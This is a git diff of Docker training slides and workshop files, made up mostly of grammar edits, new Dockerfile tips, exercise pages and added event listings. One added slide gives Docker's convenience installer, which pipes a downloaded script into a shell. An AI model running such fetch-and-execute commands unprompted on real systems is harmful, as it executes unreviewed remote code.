-    padding-right: 1.5%;
-}
-
-p {
-    margin: 0.4em 0 0.4em 0;
-}
-
-img {
-    height: 4em;
-    float: right;
-    margin-right: -0.4em;
-}
-
-.logpass {
-    font-family: monospace;
-    font-weight: bold;
-}
-
-.pagebreak {
-    page-break-after: always;
-    clear: both;
-    display: block;
-    height: 8px;
-}
-</style></head>
-<body>
-{% for cluster in clusters %}
-    {% if loop.index0>0 and loop.index0%pagesize==0 %}
-        <span class="pagebreak"></span>
-    {% endif %}
-    <div>
-
-        <p>
-            Here is the connection information to your very own
-            {{ cluster_or_machine }} for this {{ workshop_name }}.
-            You can connect to {{ this_or_each }} VM with any SSH client.
-        </p>
-        <p>
-            <img src="{{ image_src }}" />
-            <table>
-                <tr><td>login:</td></tr>
-                <tr><td class="logpass">docker</td></tr>
-                <tr><td>password:</td></tr>
-                <tr><td class="logpass">{{ docker_user_password }}</td></tr>
-            </table>
-
-        </p>
-        <p>
-            Your {{ machine_is_or_machines_are }}:
-            <table>
-                {% for node in cluster %}
-                <tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
-                {% endfor %}
-            </table>
-        </p>
-        <p>You can find the slides at:
-            <center>{{ url }}</center>
-        </p>
-    </div>
-{% endfor %}
-</body>
-</html>
--- a/slides/Dockerfile
+++ b/slides/Dockerfile
@@ -1,7 +1,4 @@
-FROM alpine
-RUN apk update
-RUN apk add entr
-RUN apk add py-pip
-RUN apk add git
+FROM alpine:3.9
+RUN apk add --no-cache entr py-pip git
 COPY requirements.txt .
 RUN pip install -r requirements.txt
--- a/slides/_redirects
+++ b/slides/_redirects
@@ -2,4 +2,6 @@
 #/ /kube-halfday.yml.html 200
 #/ /kube-fullday.yml.html 200
 #/ /kube-twodays.yml.html 200
-/ /intro-fullday.yml.html 200!
+
+# And this allows to do "git clone https://container.training".
+/info/refs service=git-upload-pack https://github.com/jpetazzo/container.training/info/refs?service=git-upload-pack
--- a/slides/containers/Ambassadors.md
+++ b/slides/containers/Ambassadors.md
@@ -150,7 +150,7 @@ Different deployments will use different underlying technologies.
 * Ad-hoc deployments can use a master-less discovery protocol
  like avahi to register and discover services.
 * It is also possible to do one-shot reconfiguration of the
-  ambassadors. It is slightly less dynamic but has much less
+  ambassadors. It is slightly less dynamic but has far fewer
  requirements.
 * Ambassadors can be used in addition to, or instead of, overlay networks.

@@ -186,22 +186,48 @@ Different deployments will use different underlying technologies.

 ---

-## Section summary
+## Some popular service meshes

-We've learned how to:
+... And related projects:

-* Understand the ambassador pattern and what it is used for (service portability).
-
-For more information about the ambassador pattern, including demos on Swarm and ECS: 
-
-* AWS re:invent 2015 [DVO317](https://www.youtube.com/watch?v=7CZFpHUPqXw)
-
-* [SwarmWeek video about Swarm+Compose](https://youtube.com/watch?v=qbIvUvwa6As)
-
-Some services meshes and related projects:
-
-* [Istio](https://istio.io/)
-
-* [Linkerd](https://linkerd.io/)
+* [Consul Connect](https://www.consul.io/docs/connect/index.html)
+  <br/>
+  Transparently secures service-to-service connections with mTLS.

 * [Gloo](https://gloo.solo.io/)
+  <br/>
+  API gateway that can interconnect applications on VMs, containers, and serverless.
+
+* [Istio](https://istio.io/)
+  <br/>
+  A popular service mesh.
+
+* [Linkerd](https://linkerd.io/)
+  <br/>
+  Another popular service mesh.
+
+---
+
+## Learning more about service meshes
+
+A few blog posts about service meshes:
+
+* [Containers, microservices, and service meshes](http://jpetazzo.github.io/2019/05/17/containers-microservices-service-meshes/)
+  <br/>
+  Provides historical context: how did we do before service meshes were invented?
+
+* [Do I Need a Service Mesh?](https://www.nginx.com/blog/do-i-need-a-service-mesh/)
+  <br/>
+  Explains the purpose of service meshes. Illustrates some NGINX features.
+
+* [Do you need a service mesh?](https://www.oreilly.com/ideas/do-you-need-a-service-mesh)
+  <br/>
+  Includes high-level overview and definitions.
+
+* [What is Service Mesh and Why Do We Need It?](https://containerjournal.com/2018/12/12/what-is-service-mesh-and-why-do-we-need-it/)
+  <br/>
+  Includes a step-by-step demo of Linkerd.
+
+And a video:
+
+* [What is a Service Mesh, and Do I Need One When Developing Microservices?](https://www.datawire.io/envoyproxy/service-mesh/)
--- a/slides/containers/Application_Configuration.md
+++ b/slides/containers/Application_Configuration.md
@@ -98,13 +98,13 @@ COPY prometheus.conf /etc

 * Allows arbitrary customization and complex configuration files.

-* Requires to write a configuration file. (Obviously!)
+* Requires writing a configuration file. (Obviously!)

-* Requires to build an image to start the service.
+* Requires building an image to start the service.

-* Requires to rebuild the image to reconfigure the service.
+* Requires rebuilding the image to reconfigure the service.

-* Requires to rebuild the image to upgrade the service.
+* Requires rebuilding the image to upgrade the service.

 * Configured images can be stored in registries.

@@ -132,11 +132,11 @@ docker run -v appconfig:/etc/appconfig myapp

 * Allows arbitrary customization and complex configuration files.

-* Requires to create a volume for each different configuration.
+* Requires creating a volume for each different configuration.

 * Services with identical configurations can use the same volume.

-* Doesn't require to build / rebuild an image when upgrading / reconfiguring.
+* Doesn't require building / rebuilding an image when upgrading / reconfiguring.

 * Configuration can be generated or edited through another container.

@@ -198,4 +198,4 @@ E.g.:

 - read the secret on stdin when the service starts,

- pass the secret using an API endpoint.
+- pass the secret using an API endpoint.
--- a/slides/containers/Background_Containers.md
+++ b/slides/containers/Background_Containers.md
@@ -257,7 +257,7 @@ $ docker kill 068 57ad
 The `stop` and `kill` commands can take multiple container IDs.

 Those containers will be terminated immediately (without
-the 10 seconds delay).
+the 10-second delay).

 Let's check that our containers don't show up anymore:

--- a/slides/containers/Cmd_And_Entrypoint.md
+++ b/slides/containers/Cmd_And_Entrypoint.md
@@ -222,16 +222,16 @@ CMD ["hello world"]
 Let's build it:

 ```bash
-$ docker build -t figlet .
+$ docker build -t myfiglet .
 ...
 Successfully built 6e0b6a048a07
-Successfully tagged figlet:latest
+Successfully tagged myfiglet:latest
 ```

 Run it without parameters:

 ```bash
-$ docker run figlet
+$ docker run myfiglet
 _          _   _                             _        
 | |        | | | |                           | |    |  
 | |     _  | | | |  __             __   ,_   | |  __|  
@@ -246,7 +246,7 @@ $ docker run figlet
 Now let's pass extra arguments to the image.

 ```bash
-$ docker run figlet hola mundo
+$ docker run myfiglet hola mundo
 _           _                                               
 | |         | |                                      |       
 | |     __  | |  __,     _  _  _           _  _    __|   __  
@@ -262,13 +262,13 @@ We overrode `CMD` but still used `ENTRYPOINT`.

 What if we want to run a shell in our container?

-We cannot just do `docker run figlet bash` because
+We cannot just do `docker run myfiglet bash` because
 that would just tell figlet to display the word "bash."

 We use the `--entrypoint` parameter:

 ```bash
-$ docker run -it --entrypoint bash figlet
+$ docker run -it --entrypoint bash myfiglet
 root@6027e44e2955:/# 
 ```

--- a/slides/containers/Container_Engines.md
+++ b/slides/containers/Container_Engines.md
@@ -86,7 +86,7 @@ like Windows, macOS, Solaris, FreeBSD ...

 * No notion of image (container filesystems have to be managed manually).

-* Networking has to be setup manually.
+* Networking has to be set up manually.

 ---

@@ -112,7 +112,7 @@ like Windows, macOS, Solaris, FreeBSD ...

 * Strong emphasis on security (through privilege separation).

-* Networking has to be setup separately (e.g. through CNI plugins).
+* Networking has to be set up separately (e.g. through CNI plugins).

 * Partial image management (pull, but no push).

@@ -152,7 +152,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).

 * Basic image support (tar archives and raw disk images).

-* Network has to be setup manually.
+* Network has to be set up manually.

 ---

@@ -164,7 +164,7 @@ We're not aware of anyone using it directly (i.e. outside of Kubernetes).

 * Run each container in a lightweight virtual machine.

-* Requires to run on bare metal *or* with nested virtualization.
+* Requires running on bare metal *or* with nested virtualization.

 ---

--- a/slides/containers/Container_Network_Model.md
+++ b/slides/containers/Container_Network_Model.md
@@ -474,7 +474,7 @@ When creating a network, extra options can be provided.

 * `--ip-range` (in CIDR notation) indicates the subnet to allocate from.

-* `--aux-address` allows to specify a list of reserved addresses (which won't be allocated to containers).
+* `--aux-address` allows specifying a list of reserved addresses (which won't be allocated to containers).

 ---

@@ -528,7 +528,9 @@ Very short instructions:
 - `docker network create mynet --driver overlay`
 - `docker service create --network mynet myimage`

-See https://jpetazzo.github.io/container.training for all the deets about clustering!
+If you want to learn more about Swarm mode, you can check
+[this video](https://www.youtube.com/watch?v=EuzoEaE6Cqs)
+or [these slides](https://container.training/swarm-selfpaced.yml.html).

 ---

@@ -554,7 +556,7 @@ General idea:

 * So far, we have specified which network to use when starting the container.

-* The Docker Engine also allows to connect and disconnect while the container runs.
+* The Docker Engine also allows connecting and disconnecting while the container is running.

 * This feature is exposed through the Docker API, and through two Docker CLI commands:

--- a/slides/containers/Dockerfile_Tips.md
+++ b/slides/containers/Dockerfile_Tips.md
@@ -76,6 +76,78 @@ CMD ["python", "app.py"]

 ---

+## Be careful with `chown`, `chmod`, `mv`
+
+* Layers cannot store efficiently changes in permissions or ownership.
+
+* Layers cannot represent efficiently when a file is moved either.
+
+* As a result, operations like `chown`, `chown`, `mv` can be expensive.
+
+* For instance, in the Dockerfile snippet below, each `RUN` line
+  creates a layer with an entire copy of `some-file`.
+
+  ```dockerfile
+  COPY some-file .
+  RUN chown www-data:www-data some-file
+  RUN chmod 644 some-file
+  RUN mv some-file /var/www
+  ```
+
+* How can we avoid that?
+
+---
+
+## Put files on the right place
+
+* Instead of using `mv`, directly put files at the right place.
+
+* When extracting archives (tar, zip...), merge operations in a single layer.
+
+  Example:
+
+  ```dockerfile
+    ...
+    RUN wget http://.../foo.tar.gz \
+     && tar -zxf foo.tar.gz \
+     && mv foo/fooctl /usr/local/bin \
+     && rm -rf foo
+  ...
+  ```
+
+---
+
+## Use `COPY --chown`
+
+* The Dockerfile instruction `COPY` can take a `--chown` parameter.
+
+  Examples:
+
+  ```dockerfile
+  ...
+  COPY --chown=1000 some-file .
+  COPY --chown=1000:1000 some-file .
+  COPY --chown=www-data:www-data some-file .
+  ```
+
+* The `--chown` flag can specify a user, or a user:group pair.
+
+* The user and group can be specified as names or numbers.
+
+* When using names, the names must exist in `/etc/passwd` or `/etc/group`.
+
+  *(In the container, not on the host!)*
+
+---
+
+## Set correct permissions locally
+
+* Instead of using `chmod`, set the right file permissions locally.
+
+* When files are copied with `COPY`, permissions are preserved.
+
+---
+
 ## Embedding unit tests in the build process

 ```dockerfile
--- a/slides/containers/Exercise_Composefile.md
+++ b/slides/containers/Exercise_Composefile.md
@@ -0,0 +1,5 @@
+# Exercise — writing a Compose file
+
+Let's write a Compose file for the wordsmith app!
+
+The code is at: https://github.com/jpetazzo/wordsmith
--- a/slides/containers/Exercise_Dockerfile_Advanced.md
+++ b/slides/containers/Exercise_Dockerfile_Advanced.md
@@ -0,0 +1,9 @@
+# Exercise — writing better Dockerfiles
+
+Let's update our Dockerfiles to leverage multi-stage builds!
+
+The code is at: https://github.com/jpetazzo/wordsmith
+
+Use a different tag for these images, so that we can compare their sizes.
+
+What's the size difference between single-stage and multi-stage builds?
--- a/slides/containers/Exercise_Dockerfile_Basic.md
+++ b/slides/containers/Exercise_Dockerfile_Basic.md
@@ -0,0 +1,5 @@
+# Exercise — writing Dockerfiles
+
+Let's write Dockerfiles for an existing application!
+
+The code is at: https://github.com/jpetazzo/wordsmith
--- a/slides/containers/First_Containers.md
+++ b/slides/containers/First_Containers.md
@@ -203,4 +203,90 @@ bash: figlet: command not found

 * The basic Ubuntu image was used, and `figlet` is not here.

-* We will see in the next chapters how to bake a custom image with `figlet`.
+---
+
+## Where's my container?
+
+* Can we reuse that container that we took time to customize?
+
+  *We can, but that's not the default workflow with Docker.*
+
+* What's the default workflow, then?
+
+  *Always start with a fresh container.*
+  <br/>
+  *If we need something installed in our container, build a custom image.*
+
+* That seems complicated!
+
+  *We'll see that it's actually pretty easy!*
+
+* And what's the point?
+
+  *This puts a strong emphasis on automation and repeatability. Let's see why ...*
+
+---
+
+## Pets vs. Cattle
+
+* In the "pets vs. cattle" metaphor, there are two kinds of servers.
+
+* Pets:
+
+  * have distinctive names and unique configurations
+
+  * when they have an outage, we do everything we can to fix them
+
+* Cattle:
+
+  * have generic names (e.g. with numbers) and generic configuration
+
+  * configuration is enforced by configuration management, golden images ...
+
+  * when they have an outage, we can replace them immediately with a new server
+
+* What's the connection with Docker and containers?
+
+---
+
+## Local development environments
+
+* When we use local VMs (with e.g. VirtualBox or VMware), our workflow looks like this:
+
+  * create VM from base template (Ubuntu, CentOS...)
+
+  * install packages, set up environment
+
+  * work on project
+
+  * when done, shut down VM
+
+  * next time we need to work on project, restart VM as we left it
+
+  * if we need to tweak the environment, we do it live
+
+* Over time, the VM configuration evolves, diverges.
+
+* We don't have a clean, reliable, deterministic way to provision that environment.
+
+---
+
+## Local development with Docker
+
+* With Docker, the workflow looks like this:
+
+  * create container image with our dev environment
+
+  * run container with that image
+
+  * work on project
+
+  * when done, shut down container
+
+  * next time we need to work on project, start a new container
+
+  * if we need to tweak the environment, we create a new image
+
+* We have a clear definition of our environment, and can share it reliably with others.
+
+* Let's see in the next chapters how to bake a custom image with `figlet`!
--- a/slides/containers/Initial_Images.md
+++ b/slides/containers/Initial_Images.md
@@ -70,8 +70,9 @@ class: pic

 * An image is a read-only filesystem.

-* A container is an encapsulated set of processes running in a
-  read-write copy of that filesystem.
+* A container is an encapsulated set of processes,
+
+  running in a read-write copy of that filesystem.

 * To optimize container boot time, *copy-on-write* is used
  instead of regular copy.
@@ -177,8 +178,11 @@ Let's explain each of them.

 ## Root namespace

-The root namespace is for official images. They are put there by Docker Inc.,
-but they are generally authored and maintained by third parties.
+The root namespace is for official images.
+
+They are gated by Docker Inc.
+
+They are generally authored and maintained by third parties.

 Those images include:

@@ -188,7 +192,7 @@ Those images include:

 * Ready-to-use components and services, like redis, postgresql...

-* Over 130 at this point!
+* Over 150 at this point!

 ---

--- a/slides/containers/Installing_Docker.md
+++ b/slides/containers/Installing_Docker.md
@@ -38,11 +38,7 @@ We can arbitrarily distinguish:

 ## Installing Docker on Linux

-* The recommended method is to install the packages supplied by Docker Inc.:
-
-  https://store.docker.com
-
-* The general method is:
+* The recommended method is to install the packages supplied by Docker Inc :

  - add Docker Inc.'s package repositories to your system configuration

@@ -56,6 +52,12 @@ We can arbitrarily distinguish:

  https://docs.docker.com/engine/installation/linux/docker-ce/binaries/

+* To quickly setup a dev environment, Docker provides a convenience install script:
+
+  ```bash
+  curl -fsSL get.docker.com | sh
+  ```
+
 ---

 class: extra-details
--- a/slides/containers/Local_Development_Workflow.md
+++ b/slides/containers/Local_Development_Workflow.md
@@ -156,7 +156,7 @@ Option 3:

 * Use a *volume* to mount local files into the container
 * Make changes locally
-* Changes are reflected into the container
+* Changes are reflected in the container

 ---

@@ -176,7 +176,7 @@ $ docker run -d -v $(pwd):/src -P namer

 * `namer` is the name of the image we will run.

-* We don't specify a command to run because it is already set in the Dockerfile.
+* We don't specify a command to run because it is already set in the Dockerfile via `CMD`.

 Note: on Windows, replace `$(pwd)` with `%cd%` (or `${pwd}` if you use PowerShell).

@@ -192,7 +192,7 @@ The flag structure is:
 [host-path]:[container-path]:[rw|ro]
 ```

-* If `[host-path]` or `[container-path]` doesn't exist it is created.
+* `[host-path]` and `[container-path]` are created if they don't exist.

 * You can control the write status of the volume with the `ro` and
  `rw` options.
@@ -255,13 +255,13 @@ color: red;

 * Volumes are *not* copying or synchronizing files between the host and the container.

-* Volumes are *bind mounts*: a kernel mechanism associating a path to another.
+* Volumes are *bind mounts*: a kernel mechanism associating one path with another.

 * Bind mounts are *kind of* similar to symbolic links, but at a very different level.

 * Changes made on the host or on the container will be visible on the other side.

-  (Since under the hood, it's the same file on both anyway.)
+  (Under the hood, it's the same file anyway.)

 ---

@@ -273,7 +273,7 @@ by Chad Fowler, where he explains the concept of immutable infrastructure.)*

 --

-* Let's mess up majorly with our container.
+* Let's majorly mess up our container.

  (Remove files or whatever.)

@@ -319,7 +319,7 @@ and *canary deployments*.
   <br/>
   Use the `-v` flag to mount our source code inside the container.

-3. Edit the source code outside the containers, using regular tools.
+3. Edit the source code outside the container, using familiar tools.
   <br/>
   (vim, emacs, textmate...)

--- a/slides/containers/Namespaces_Cgroups.md
+++ b/slides/containers/Namespaces_Cgroups.md
@@ -86,13 +86,13 @@ class: extra-details, deep-dive

  - the `unshare()` system call.

- The Linux tool `unshare` allows to do that from a shell.
+- The Linux tool `unshare` allows doing that from a shell.

 - A new process can re-use none / all / some of the namespaces of its parent.

 - It is possible to "enter" a namespace with the `setns()` system call.

- The Linux tool `nsenter` allows to do that from a shell.
+- The Linux tool `nsenter` allows doing that from a shell.

 ---

@@ -138,11 +138,11 @@ class: extra-details, deep-dive

 - gethostname / sethostname

- Allows to set a custom hostname for a container.
+- Allows setting a custom hostname for a container.

 - That's (mostly) it!

- Also allows to set the NIS domain.
+- Also allows setting the NIS domain.

  (If you don't know what a NIS domain is, you don't have to worry about it!)

@@ -392,13 +392,13 @@ class: extra-details

 - Processes can have their own root fs (à la chroot).

- Processes can also have "private" mounts. This allows to:
+- Processes can also have "private" mounts. This allows:

-  - isolate `/tmp` (per user, per service...)
+  - isolating `/tmp` (per user, per service...)

-  - mask `/proc`, `/sys` (for processes that don't need them)
+  - masking `/proc`, `/sys` (for processes that don't need them)

-  - mount remote filesystems or sensitive data,
+  - mounting remote filesystems or sensitive data,
    <br/>but make it visible only for allowed processes

 - Mounts can be totally private, or shared.
@@ -570,7 +570,7 @@ Check `man 2 unshare` and `man pid_namespaces` if you want more details.

 ## User namespace

- Allows to map UID/GID; e.g.:
+- Allows mapping UID/GID; e.g.:

  - UID 0→1999 in container C1 is mapped to UID 10000→11999 on host
  - UID 0→1999 in container C2 is mapped to UID 12000→13999 on host
@@ -947,7 +947,7 @@ Killed

  (i.e., "this group of process used X seconds of CPU0 and Y seconds of CPU1".)

- Allows to set relative weights used by the scheduler.
+- Allows setting relative weights used by the scheduler.

 ---

@@ -1101,9 +1101,9 @@ See `man capabilities` for the full list and details.

 - Original seccomp only allows `read()`, `write()`, `exit()`, `sigreturn()`.

- The seccomp-bpf extension allows to specify custom filters with BPF rules.
+- The seccomp-bpf extension allows specifying custom filters with BPF rules.

- This allows to filter by syscall, and by parameter.
+- This allows filtering by syscall, and by parameter.

 - BPF code can perform arbitrarily complex checks, quickly, and safely.

--- a/slides/containers/Orchestration_Overview.md
+++ b/slides/containers/Orchestration_Overview.md
@@ -6,8 +6,6 @@ In this chapter, we will:

 * Present (from a high-level perspective) some orchestrators.

-* Show one orchestrator (Kubernetes) in action.
-
 ---

 class: pic
@@ -121,7 +119,7 @@ Now, how are things for our IAAS provider?
 - Solution: *migrate* VMs and shutdown empty servers
  
  (e.g. combine two hypervisors with 40% load into 80%+0%,
-  <br/>and shutdown the one at 0%)
+  <br/>and shut down the one at 0%)

 ---

@@ -129,7 +127,7 @@ Now, how are things for our IAAS provider?

 How do we implement this?

- Shutdown empty hosts (but keep some spare capacity)
+- Shut down empty hosts (but keep some spare capacity)

 - Start hosts again when capacity gets low

@@ -177,7 +175,7 @@ In practice, these goals often conflict.

  - 16 GB RAM, 8 cores, 1 TB disk

- Each week, your team asks:
+- Each week, your team requests:

  - one VM with X RAM, Y CPU, Z disk

--- a/slides/containers/Resource_Limits.md
+++ b/slides/containers/Resource_Limits.md
@@ -72,7 +72,7 @@

 - For memory usage, the mechanism is part of the *cgroup* subsystem.

- This subsystem allows to limit the memory for a process or a group of processes.
+- This subsystem allows limiting the memory for a process or a group of processes.

 - A container engine leverages these mechanisms to limit memory for a container.

--- a/slides/containers/Training_Environment.md
+++ b/slides/containers/Training_Environment.md
@@ -45,13 +45,13 @@ individual Docker VM.*

 - The Docker Engine is a daemon (a service running in the background).

- This daemon manages containers, the same way that an hypervisor manages VMs.
+- This daemon manages containers, the same way that a hypervisor manages VMs.

 - We interact with the Docker Engine by using the Docker CLI.

 - The Docker CLI and the Docker Engine communicate through an API.

- There are many other programs, and many client libraries, to use that API.
+- There are many other programs and client libraries which use that API.

 ---

--- a/slides/containers/Working_With_Volumes.md
+++ b/slides/containers/Working_With_Volumes.md
@@ -33,13 +33,13 @@ Docker volumes can be used to achieve many things, including:

 * Sharing a *single file* between the host and a container.

-* Using remote storage and custom storage with "volume drivers".
+* Using remote storage and custom storage with *volume drivers*.

 ---

 ## Volumes are special directories in a container

-Volumes can be declared in two different ways.
+Volumes can be declared in two different ways:

 * Within a `Dockerfile`, with a `VOLUME` instruction.

@@ -163,7 +163,7 @@ Volumes are not anchored to a specific path.

 * Volumes are used with the `-v` option.

-* When a host path does not contain a /, it is considered to be a volume name.
+* When a host path does not contain a `/`, it is considered a volume name.

 Let's start a web server using the two previous volumes.

@@ -189,7 +189,7 @@ $ curl localhost:1234

 * In this example, we will run a text editor in the other container.

-  (But this could be a FTP server, a WebDAV server, a Git receiver...)
+  (But this could be an FTP server, a WebDAV server, a Git receiver...)

 Let's start another container using the `webapps` volume.

--- a/slides/images/kubectl-run-slideshow/01.svg
+++ b/slides/images/kubectl-run-slideshow/01.svg
--- a/slides/images/kubectl-run-slideshow/02.svg
+++ b/slides/images/kubectl-run-slideshow/02.svg
--- a/slides/images/kubectl-run-slideshow/03.svg
+++ b/slides/images/kubectl-run-slideshow/03.svg
--- a/slides/images/kubectl-run-slideshow/04.svg
+++ b/slides/images/kubectl-run-slideshow/04.svg
--- a/slides/images/kubectl-run-slideshow/05.svg
+++ b/slides/images/kubectl-run-slideshow/05.svg
--- a/slides/images/kubectl-run-slideshow/06.svg
+++ b/slides/images/kubectl-run-slideshow/06.svg
--- a/slides/images/kubectl-run-slideshow/07.svg
+++ b/slides/images/kubectl-run-slideshow/07.svg
--- a/slides/images/kubectl-run-slideshow/08.svg
+++ b/slides/images/kubectl-run-slideshow/08.svg
--- a/slides/images/kubectl-run-slideshow/09.svg
+++ b/slides/images/kubectl-run-slideshow/09.svg
--- a/slides/images/kubectl-run-slideshow/10.svg
+++ b/slides/images/kubectl-run-slideshow/10.svg
--- a/slides/images/kubectl-run-slideshow/11.svg
+++ b/slides/images/kubectl-run-slideshow/11.svg
--- a/slides/images/kubectl-run-slideshow/12.svg
+++ b/slides/images/kubectl-run-slideshow/12.svg
--- a/slides/images/kubectl-run-slideshow/13.svg
+++ b/slides/images/kubectl-run-slideshow/13.svg
--- a/slides/images/kubectl-run-slideshow/14.svg
+++ b/slides/images/kubectl-run-slideshow/14.svg
--- a/slides/images/kubectl-run-slideshow/15.svg
+++ b/slides/images/kubectl-run-slideshow/15.svg
--- a/slides/images/kubectl-run-slideshow/16.svg
+++ b/slides/images/kubectl-run-slideshow/16.svg
--- a/slides/images/kubectl-run-slideshow/17.svg
+++ b/slides/images/kubectl-run-slideshow/17.svg
--- a/slides/images/kubectl-run-slideshow/18.svg
+++ b/slides/images/kubectl-run-slideshow/18.svg
--- a/slides/images/kubectl-run-slideshow/19.svg
+++ b/slides/images/kubectl-run-slideshow/19.svg
--- a/slides/index.yaml
+++ b/slides/index.yaml
@@ -1,3 +1,55 @@
+- date: [2019-11-04, 2019-11-05]
+  country: de
+  city: Berlin
+  event: Velocity
+  speaker: jpetazzo
+  title: Deploying and scaling applications with Kubernetes
+  attend: https://conferences.oreilly.com/velocity/vl-eu/public/schedule/detail/79109
+
+- date: 2019-11-13
+  country: fr
+  city: Marseille
+  event: DevopsDDay
+  speaker: jpetazzo
+  title: Déployer ses applications avec Kubernetes (in French)
+  lang: fr
+  attend: http://2019.devops-dday.com/Workshop.html
+
+- date: [2019-09-24, 2019-09-25]
+  country: fr
+  city: Paris
+  event: ENIX SAS
+  speaker: jpetazzo
+  title: Déployer ses applications avec Kubernetes (in French)
+  lang: fr
+  attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
+
+- date: 2019-07-16
+  country: us
+  city: Portland, OR
+  event: OSCON
+  speaker: bridgetkromhout
+  title: "Kubernetes 201: Production tooling"
+  attend: https://conferences.oreilly.com/oscon/oscon-or/public/schedule/detail/76390
+  slides: https://oscon2019.container.training
+
+- date: 2019-06-17
+  country: ca
+  city: Montréal
+  event: Zenika
+  speaker: jpetazzo
+  title: Getting Started With Kubernetes
+  attend: https://www.eventbrite.com/e/getting-started-with-kubernetes-1-day-en-tickets-61658444066
+
+- date: [2019-06-10, 2019-06-11]
+  city: San Jose, CA
+  country: us
+  event: Velocity
+  title: Kubernetes for administrators and operators
+  speaker: jpetazzo
+  attend: https://conferences.oreilly.com/velocity/vl-ca/public/schedule/detail/75313
+  slides: https://kadm-2019-06.container.training/
+
 - date: 2019-05-01
  country: us
  city: Cleveland, OH
@@ -5,6 +57,8 @@
  speaker: jpetazzo, s0ulshake
  title: Getting started with Kubernetes and container orchestration
  attend: https://us.pycon.org/2019/schedule/presentation/74/
+  slides: https://pycon2019.container.training/
+  video: https://www.youtube.com/watch?v=J08MrW2NC1Y

 - date: 2019-04-28
  country: us
@@ -13,15 +67,26 @@
  speaker: jpetazzo
  title: Getting Started With Kubernetes and Container Orchestration
  attend: https://gotochgo.com/2019/workshops/148
+  slides: https://gotochgo2019.container.training/
+
+- date: 2019-04-26
+  country: fr
+  city: Paris
+  event: ENIX SAS
+  speaker: jpetazzo
+  title: Opérer et administrer Kubernetes
+  attend: https://enix.io/fr/services/formation/operer-et-administrer-kubernetes/
+  slides: https://kadm-2019-04.container.training/

 - date: [2019-04-23, 2019-04-24]
  country: fr
  city: Paris
  event: ENIX SAS
-  speaker: "jpetazzo, rdegez"
+  speaker: jpetazzo
  title: Déployer ses applications avec Kubernetes (in French)
  lang: fr
  attend: https://enix.io/fr/services/formation/deployer-ses-applications-avec-kubernetes/
+  slides: https://kube-2019-04.container.training/

 - date: [2019-04-15, 2019-04-16]
  country: fr
@@ -31,6 +96,7 @@
  title: Bien démarrer avec les conteneurs (in French)
  lang: fr
  attend: https://enix.io/fr/services/formation/bien-demarrer-avec-les-conteneurs/
+  slides: http://intro-2019-04.container.training/

 - date: 2019-03-08
  country: uk
--- a/slides/intro-fullday.yml
+++ b/slides/intro-fullday.yml
@@ -1,85 +0,0 @@
-title: |
-  Bien d&eacute;marrer
-  avec les conteneurs
-
-#chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-chat: "[Gitter](https://gitter.im/enix/formation-docker-20190415)"
-
-gitrepo: github.com/jpetazzo/container.training
-
-slides: http://intro-2019-04.container.training/
-
-exclude:
- self-paced
-
-chapters:
- shared/title.md
- logistics.md
- containers/intro.md
- shared/about-slides.md
- shared/toc.md
- - containers/Docker_Overview.md
-  #- containers/Docker_History.md
-  - containers/Training_Environment.md
-  - containers/Installing_Docker.md
-  - containers/First_Containers.md
-  - containers/Background_Containers.md
-  - containers/Start_And_Attach.md
- - containers/Initial_Images.md
-  - containers/Building_Images_Interactively.md
-  - containers/Building_Images_With_Dockerfiles.md
-  - containers/Cmd_And_Entrypoint.md
- - containers/Copying_Files_During_Build.md
-  - |
-      # Exercise — writing Dockerfiles
-
-      Let's write Dockerfiles for an existing application!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
-  - containers/Multi_Stage_Builds.md
-  - containers/Publishing_To_Docker_Hub.md
-  - containers/Dockerfile_Tips.md
-  - |
-      # Exercise — writing better Dockerfiles
-
-      Let's update our Dockerfiles to leverage multi-stage builds!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
-      Use a different tag for these images, so that we can compare their sizes.
-
-      What's the size difference between single-stage and multi-stage builds?
-
- - containers/Naming_And_Inspecting.md
-  - containers/Labels.md
-  - containers/Getting_Inside.md
-  - containers/Resource_Limits.md
- - containers/Container_Networking_Basics.md
-  - containers/Network_Drivers.md
-  - containers/Container_Network_Model.md
-  #- containers/Connecting_Containers_With_Links.md
-  - containers/Ambassadors.md
- - containers/Local_Development_Workflow.md
-  - containers/Windows_Containers.md
-  - containers/Working_With_Volumes.md
-  - containers/Compose_For_Dev_Stacks.md
-  - |
-      # Exercise — writing a Compose file
-
-      Let's write a Compose file for the wordsmith app!
-
-      The code is at: https://github.com/jpetazzo/wordsmith
-
- - containers/Docker_Machine.md
-  - containers/Advanced_Dockerfiles.md
-  - containers/Application_Configuration.md
-  - containers/Logging.md
- - containers/Namespaces_Cgroups.md
-  - containers/Copy_On_Write.md
-  #- containers/Containers_From_Scratch.md
- - containers/Container_Engines.md
-  #- containers/Ecosystem.md
-  - containers/Orchestration_Overview.md
-  - shared/thankyou.md
-  - containers/links.md
--- a/slides/intro-selfpaced.yml
+++ b/slides/intro-selfpaced.yml
@@ -1,60 +0,0 @@
-title: |
-  Introduction
-  to Containers
-
-chat: "[Slack](https://dockercommunity.slack.com/messages/C7GKACWDV)"
-#chat: "[Gitter](https://gitter.im/jpetazzo/workshop-yyyymmdd-city)"
-
-gitrepo: github.com/jpetazzo/container.training
-
-slides: http://container.training/
-
-exclude:
- in-person
-
-chapters:
- shared/title.md
-# - shared/logistics.md
- containers/intro.md
- shared/about-slides.md
- shared/toc.md
- - containers/Docker_Overview.md
-  - containers/Docker_History.md
-  - containers/Training_Environment.md
-  - containers/Installing_Docker.md
-  - containers/First_Containers.md
-  - containers/Background_Containers.md
-  - containers/Start_And_Attach.md
- - containers/Initial_Images.md
-  - containers/Building_Images_Interactively.md
-  - containers/Building_Images_With_Dockerfiles.md
-  - containers/Cmd_And_Entrypoint.md
-  - containers/Copying_Files_During_Build.md
- - containers/Multi_Stage_Builds.md
-  - containers/Publishing_To_Docker_Hub.md
-  - containers/Dockerfile_Tips.md
- - containers/Naming_And_Inspecting.md
-  - containers/Labels.md
-  - containers/Getting_Inside.md
- - containers/Container_Networking_Basics.md
-  - containers/Network_Drivers.md
-  - containers/Container_Network_Model.md
-  #- containers/Connecting_Containers_With_Links.md
-  - containers/Ambassadors.md
- - containers/Local_Development_Workflow.md
-  - containers/Windows_Containers.md
-  - containers/Working_With_Volumes.md
-  - containers/Compose_For_Dev_Stacks.md
